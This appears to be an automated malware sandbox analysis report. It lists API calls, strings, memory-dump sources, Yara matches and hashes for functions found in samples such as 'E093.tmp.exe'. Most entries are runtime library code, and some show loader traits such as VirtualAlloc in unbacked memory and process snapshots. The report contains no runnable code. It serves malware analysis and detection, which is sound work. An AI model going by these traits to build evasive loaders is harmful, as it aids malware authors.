GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024B29CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B29E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024B29EE

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 6fbfe7038acc54937837cc3c72b1e6511ff6c41af0898bb68a79bede44b8dbd6
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: F9E04F342001096ADB11EF668C08BFB36686F00745B50092AB919D10A0EB75D1149AB8

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 024B2959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,024B0DA0), ref: 024B295F
GetLastError.KERNEL32 ref: 024B296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024B2982
__CxxThrowException@8.LIBVCRUNTIME ref: 024B2990

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: ccfc59aa31d18cde681723430bd432dafb0f4713ea02d887cacfc68ffbe25ea2
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: F0E0C234100105678715FBBA9C48ABB32A86E01715B600B2BF865E20F0EBA8D1084AB9

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 024DB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024DB32B,?,00000050,?,?,?,?,?), ref: 024DB1AB

Strings

ACP, xrefs: 024DB0EE
OCP, xrefs: 024DB124

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 7cfee5b3903e7db4b9f82c4805b7770c94765c1e855a3f83edb884f06dcfad5e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 5821B662A00105A6EB268F548D21B9F73AAEF44FDCF4B8126E909D7304F732D941C394

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

OCP, xrefs: 0043AEBD
ACP, xrefs: 0043AE87

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

ios_base::failbit set, xrefs: 0040C510
F(@, xrefs: 0040C547

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 024CB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,024A2AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,024A2AAD,00000000), ref: 024CB187
GetLastError.KERNEL32 ref: 024CB195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,024A2AAD,00000000), ref: 024CB1F0

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 861b1b4a421ea4c90b5d9cc975b66958b543267c0326059490cc64bbaba1c925
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 3841E738600206AFCB618F6DC84A76F7BB5EF41758F34816EE8599B3A4DB308901CB60

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: E093.tmp.exePID: 6636, Parent PID: 7096COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	40.5%
Signature Coverage:	12.2%
Total number of Nodes:	74
Total number of Limit Nodes:	5

Executed Functions

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 008F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 008F024D

Strings

cess, xrefs: 008F018D
kernel32.dll, xrefs: 008F008F, 008F0095

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 2f5da39f9660e2635b7f9a5d6ff00d7d5a8da7f531bdff6610be31206e02b5b0
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 40526974A01229DFDB64CF68C984BA8BBB1BF09304F1480D9E54DAB352DB30AE95DF15

Function 0099A0AE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0099A0D6
Module32First.KERNEL32(00000000,00000224), ref: 0099A0F6

Memory Dump Source

Source File: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Offset: 00999000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_999000_E093.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 417d66b3678ede5a7a371dff5cdd877b9951e192a6353b38649cabd11ae7f84e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 2CF062321007157BDB202ABDA88DB6E76ECEF4A724F100528E646D14C0DBB4EC454AA6

Function 008F0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,008F0223,?,?), ref: 008F0E19
SetErrorMode.KERNELBASE(00000000,?,?,008F0223,?,?), ref: 008F0E1E

Memory Dump Source

Source File: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f0000_E093.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 871f1ad702813c1d58b0d788e193df3154170197c2f1ac7536c0ed9c79c35ec1
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 83D0123154512CB7D7002A94DC09BDD7B1CDF05B62F008411FB0DD9081C770994046E5

Function 0040E71A Relevance: 2.5, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.OLE32 ref: 0040E71A
CoUninitialize.COMBASE ref: 0040E720

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2678618315.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_E093.jbxd

